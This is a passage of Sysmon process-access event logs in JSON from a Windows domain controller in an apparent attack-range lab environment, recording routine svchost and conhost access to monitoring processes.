C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2319,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2320,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2321,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2322,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2323,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2324,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2325,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:25.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2326,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:25.458\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1075-5F25-0000-001039210400}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 